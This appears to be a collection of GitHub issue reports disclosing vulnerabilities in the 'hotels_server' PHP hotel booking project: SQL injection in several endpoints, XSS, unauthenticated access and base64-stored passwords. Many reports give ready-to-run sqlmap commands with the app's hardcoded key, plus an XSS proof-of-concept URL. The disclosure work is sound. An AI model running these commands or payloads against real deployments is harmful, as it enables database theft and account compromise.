fantasticlbp / hotels_server Goto Github PK

In /view/hotelList.php

As you see, there are not any filtration in all ‘echo’s.

Also in /controller/publishHotel.php , these are inserted into database without filtration

After all, we can enjoy XSS

In controller/fetchpwd.php

the parameter was added with a string "username=" ,passed to function find

In the definition of function find,we can notice that though the author use PDO, he didn't use Prepared technique to avoid SQL injection vulnerability. What a pity!

After analyzing these codes,we can simply use sqlmap to exploit the vulnerability and have fun!

payload url : sqlmap -u "http://10.211.55.10/controller/api/hotelList.php?subjectId=2&key=TheHotelReversationApplication&request=1"

[email protected]

In /controller/api/login.php
It will receive a parameter called "telephone" to search for existed users.
But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection.
We can use SQLMAP to test this vulnerability:

In /controller/fetchpwd.php
It will receive a parameter called "username" to search for existed users.
But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection.
We can use SQLMAP to test this vulnerability:

sqlmap -u "http://192.168.31.91/controller/fetchpwd.php" --data "username=1" --dbms mysql -p username

Hotels_Server /view/login.php Enter user name unauthenticated user get password
login.php post data to doAction.php user name unauthenticated user get password
code:

SQL Injection exists : /controller/api/orderList.php
sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1"

author:[email protected]

GET parameter 'password' appears to be 'MySQL <= 5.0.11 AND time-based blind (heavy query)' injectable
PATH: http://localhost/Hotels_Server/controller/inscheck.php
Poc

.

/view/hotelList.php Unauthorized Access Vulnerability
code:

No user authentication code
visit link ：http://host/view/hotelList.php Can view background data

Poc
http://114.116.xxx.xxx/Hotels_Server/controller/api/login.php?telephone=%3Cscript%3Ealert(/xss/)%3C/script%3E

How can i translate to english

SQL Injection exists /controller/api/RevokeOrder.php
sqlmap -u "http://10.211.55.10/controller/api/RevokeOrder.php?key=TheHotelReversationApplication&city=1&orderId=1"

author:[email protected]

url /controller/api/Order.php exist SQL Injection
sqlmap -u "http://10.211.55.10/controller/api/Order.php?telephone=1&key=TheHotelReversationApplication&request=1"

author: [email protected]

exists sql inject in /controller/api/RandomHotel.php
sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1"

author:[email protected]

The application uses B64 encoding for storage of password
Obscuring a password with a trivial encoding does not protect the password.

https://cwe.mitre.org/data/definitions/261.html
https://paragonie.com/blog/2015/08/you-wouldnt-base64-a-password-cryptography-decoded

SQL Injection exists /controller/api/Room.php hotelId
sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1"

author:[email protected]